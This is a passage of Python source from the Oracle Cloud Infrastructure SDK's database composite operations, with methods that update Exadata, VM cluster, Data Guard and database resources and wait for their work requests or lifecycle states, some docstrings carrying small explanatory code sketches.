except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_exadata_infrastructure_and_wait_for_work_request(self, autonomous_exadata_infrastructure_id, update_autonomous_exadata_infrastructures_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_exadata_infrastructure_id: (required)
The Autonomous Exadata Infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousExadataInfrastructureDetails update_autonomous_exadata_infrastructures_details: (required)
Request to update the properties of an Autonomous Exadata Infrastructure.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_exadata_infrastructure(autonomous_exadata_infrastructure_id, update_autonomous_exadata_infrastructures_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_exadata_infrastructure_and_wait_for_state(self, autonomous_exadata_infrastructure_id, update_autonomous_exadata_infrastructures_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.AutonomousExadataInfrastructure` acted upon
to enter the given state(s).
:param str autonomous_exadata_infrastructure_id: (required)
The Autonomous Exadata Infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousExadataInfrastructureDetails update_autonomous_exadata_infrastructures_details: (required)
Request to update the properties of an Autonomous Exadata Infrastructure.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_exadata_infrastructure(autonomous_exadata_infrastructure_id, update_autonomous_exadata_infrastructures_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_vm_cluster_and_wait_for_work_request(self, autonomous_vm_cluster_id, update_autonomous_vm_cluster_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_vm_cluster_id: (required)
The autonomous VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousVmClusterDetails update_autonomous_vm_cluster_details: (required)
Request to update the attributes of an Autonomous VM cluster.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_vm_cluster(autonomous_vm_cluster_id, update_autonomous_vm_cluster_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_vm_cluster_and_wait_for_state(self, autonomous_vm_cluster_id, update_autonomous_vm_cluster_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_vm_cluster` and waits for the :py:class:`~oci.database.models.AutonomousVmCluster` acted upon
to enter the given state(s).
:param str autonomous_vm_cluster_id: (required)
The autonomous VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousVmClusterDetails update_autonomous_vm_cluster_details: (required)
Request to update the attributes of an Autonomous VM cluster.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousVmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
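For illustration, the waiter's success condition is a case-insensitive membership check on the resource's lifecycle state. A minimal standalone sketch of that check (no OCI dependency; ``state_matches`` is a hypothetical helper, not part of the SDK):

```python
def state_matches(current_state, wait_for_states):
    # Mirrors the evaluate_response lambda used by the composite operation:
    # both the current state and the target states are lowercased before
    # membership is tested, and a missing state never matches.
    lowered = [s.lower() for s in wait_for_states]
    return bool(current_state) and current_state.lower() in lowered

print(state_matches("AVAILABLE", ["Available", "Updating"]))  # True
print(state_matches(None, ["Available"]))                     # False
```

This is why ``wait_for_states`` entries may be given in any casing, as long as they are valid lifecycle-state values.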
"""
operation_result = self.client.update_autonomous_vm_cluster(autonomous_vm_cluster_id, update_autonomous_vm_cluster_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_backup_destination_and_wait_for_state(self, backup_destination_id, update_backup_destination_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_backup_destination` and waits for the :py:class:`~oci.database.models.BackupDestination` acted upon
to enter the given state(s).
:param str backup_destination_id: (required)
The `OCID`__ of the backup destination.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateBackupDestinationDetails update_backup_destination_details: (required)
For a RECOVERY_APPLIANCE backup destination, request to update the connection string and/or the list of VPC users.
For an NFS backup destination, request to update the NFS location.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.BackupDestination.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_backup_destination`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_backup_destination(backup_destination_id, update_backup_destination_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_backup_destination(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_cloud_exadata_infrastructure_and_wait_for_work_request(self, cloud_exadata_infrastructure_id, update_cloud_exadata_infrastructure_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_cloud_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str cloud_exadata_infrastructure_id: (required)
The cloud Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateCloudExadataInfrastructureDetails update_cloud_exadata_infrastructure_details: (required)
Request to update the properties of a cloud Exadata infrastructure resource.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_cloud_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
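Before polling, the method body falls back to the default termination states when none are given and reads the work request ID from the operation's response headers. A standalone sketch of those two steps (no OCI dependency; ``FakeResponse`` and ``resolve_wait_targets`` are hypothetical stand-ins, not SDK API):

```python
# Stand-in for the default termination states the docstring describes
# (SUCCEEDED / FAILED / CANCELED).
TERMINATION_STATES = ["SUCCEEDED", "FAILED", "CANCELED"]

class FakeResponse:
    # Minimal stand-in for the SDK response object: only headers are used here.
    def __init__(self, headers):
        self.headers = headers

def resolve_wait_targets(operation_result, work_request_states=None):
    # An empty or missing list means "wait for any terminal state".
    states = work_request_states if work_request_states else TERMINATION_STATES
    lowered = [s.lower() for s in states]
    # The service returns the work request to track in this response header.
    work_request_id = operation_result.headers['opc-work-request-id']
    return work_request_id, lowered

resp = FakeResponse({'opc-work-request-id': 'ocid1.coreservicesworkrequest.oc1..example'})
wr_id, states = resolve_wait_targets(resp)
print(wr_id)   # ocid1.coreservicesworkrequest.oc1..example
print(states)  # ['succeeded', 'failed', 'canceled']
```

Passing an explicit ``work_request_states`` list (e.g. only ``SUCCEEDED``) narrows the wait to those statuses instead of any terminal one.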
"""
operation_result = self.client.update_cloud_exadata_infrastructure(cloud_exadata_infrastructure_id, update_cloud_exadata_infrastructure_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_cloud_exadata_infrastructure_and_wait_for_state(self, cloud_exadata_infrastructure_id, update_cloud_exadata_infrastructure_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_cloud_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.CloudExadataInfrastructure` acted upon
to enter the given state(s).
:param str cloud_exadata_infrastructure_id: (required)
The cloud Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateCloudExadataInfrastructureDetails update_cloud_exadata_infrastructure_details: (required)
Request to update the properties of a cloud Exadata infrastructure resource.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.CloudExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_cloud_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_cloud_exadata_infrastructure(cloud_exadata_infrastructure_id, update_cloud_exadata_infrastructure_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_cloud_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_cloud_vm_cluster_and_wait_for_work_request(self, cloud_vm_cluster_id, update_cloud_vm_cluster_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_cloud_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str cloud_vm_cluster_id: (required)
The cloud VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateCloudVmClusterDetails update_cloud_vm_cluster_details: (required)
Request to update the attributes of a cloud VM cluster.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_cloud_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_cloud_vm_cluster(cloud_vm_cluster_id, update_cloud_vm_cluster_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_cloud_vm_cluster_and_wait_for_state(self, cloud_vm_cluster_id, update_cloud_vm_cluster_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_cloud_vm_cluster` and waits for the :py:class:`~oci.database.models.CloudVmCluster` acted upon
to enter the given state(s).
:param str cloud_vm_cluster_id: (required)
The cloud VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateCloudVmClusterDetails update_cloud_vm_cluster_details: (required)
Request to update the attributes of a cloud VM cluster.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.CloudVmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_cloud_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_cloud_vm_cluster(cloud_vm_cluster_id, update_cloud_vm_cluster_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_cloud_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_cloud_vm_cluster_iorm_config_and_wait_for_work_request(self, cloud_vm_cluster_id, cloud_vm_cluster_iorm_config_update_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_cloud_vm_cluster_iorm_config` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str cloud_vm_cluster_id: (required)
The cloud VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ExadataIormConfigUpdateDetails cloud_vm_cluster_iorm_config_update_details: (required)
Request to update the IORM configuration of the cloud VM cluster.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_cloud_vm_cluster_iorm_config`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_cloud_vm_cluster_iorm_config(cloud_vm_cluster_id, cloud_vm_cluster_iorm_config_update_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_data_guard_association_and_wait_for_work_request(self, database_id, data_guard_association_id, update_data_guard_association_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_data_guard_association` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDataGuardAssociationDetails update_data_guard_association_details: (required)
A request to update the Data Guard association of a database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_data_guard_association(database_id, data_guard_association_id, update_data_guard_association_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_data_guard_association_and_wait_for_state(self, database_id, data_guard_association_id, update_data_guard_association_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_data_guard_association` and waits for the :py:class:`~oci.database.models.DataGuardAssociation` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDataGuardAssociationDetails update_data_guard_association_details: (required)
A request to update the Data Guard association of a database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DataGuardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
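If the wait itself fails, the method wraps the error so the caller can still recover the result of the update call that already succeeded. A standalone sketch of that wrapping pattern (``CompositeError``, ``update_then_wait``, and ``failing_wait`` are toy stand-ins, not SDK API):

```python
class CompositeError(Exception):
    # Toy stand-in for oci.exceptions.CompositeOperationError: carries the
    # results of the operations that completed plus the original cause.
    def __init__(self, partial_results, cause):
        super().__init__(str(cause))
        self.partial_results = partial_results
        self.cause = cause

def update_then_wait(do_update, do_wait):
    operation_result = do_update()
    try:
        return do_wait(operation_result)
    except Exception as e:
        # The update already went through; surface it alongside the failure.
        raise CompositeError(partial_results=[operation_result], cause=e)

def failing_wait(result):
    raise TimeoutError("wait timed out")

try:
    update_then_wait(lambda: "update-ok", failing_wait)
except CompositeError as err:
    print(err.partial_results)  # ['update-ok']
```

In the SDK, ``partial_results`` lets a caller inspect the update response even when the subsequent wait raised.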
"""
operation_result = self.client.update_data_guard_association(database_id, data_guard_association_id, update_data_guard_association_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_data_guard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_database_and_wait_for_work_request(self, database_id, update_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDatabaseDetails update_database_details: (required)
Request to perform database update.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_database(database_id, update_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_database_and_wait_for_state(self, database_id, update_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_database` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDatabaseDetails update_database_details: (required)
Request to perform database update.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
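To make the two waiter knobs concrete: ``max_interval_seconds`` caps the delay between polls, and ``max_wait_seconds`` bounds the total time before giving up. A toy polling loop illustrating those semantics (standalone sketch; ``poll_until`` is hypothetical, not the SDK's waiter):

```python
import time

def poll_until(check, max_interval_seconds=30, max_wait_seconds=1200,
               clock=time.monotonic, sleep=time.sleep):
    # Retry check() until it returns True, backing off between attempts
    # (capped at max_interval_seconds) and timing out after max_wait_seconds.
    start = clock()
    interval = 1
    while True:
        if check():
            return True
        if clock() - start >= max_wait_seconds:
            raise TimeoutError("resource did not reach the requested state")
        sleep(interval)
        interval = min(interval * 2, max_interval_seconds)

# Deterministic demo: a no-op sleep and a check that passes on the third try.
calls = {"n": 0}
def fake_check():
    calls["n"] += 1
    return calls["n"] >= 3

print(poll_until(fake_check, max_interval_seconds=4, max_wait_seconds=100,
                 sleep=lambda s: None))  # True
```

The real ``oci.wait_until`` accepts these as keyword arguments via ``waiter_kwargs``, e.g. ``waiter_kwargs={'max_interval_seconds': 30, 'max_wait_seconds': 1800}``.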
"""
operation_result = self.client.update_database(database_id, update_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_database_software_image_and_wait_for_state(self, database_software_image_id, update_database_software_image_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_database_software_image` and waits for the :py:class:`~oci.database.models.DatabaseSoftwareImage` acted upon
to enter the given state(s).
:param str database_software_image_id: (required)
The database software image `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateDatabaseSoftwareImageDetails update_database_software_image_details: (required)
Request to update the properties of a database software image.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DatabaseSoftwareImage.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_database_software_image`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_database_software_image(database_software_image_id, update_database_software_image_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database_software_image(wait_for_resource_id),
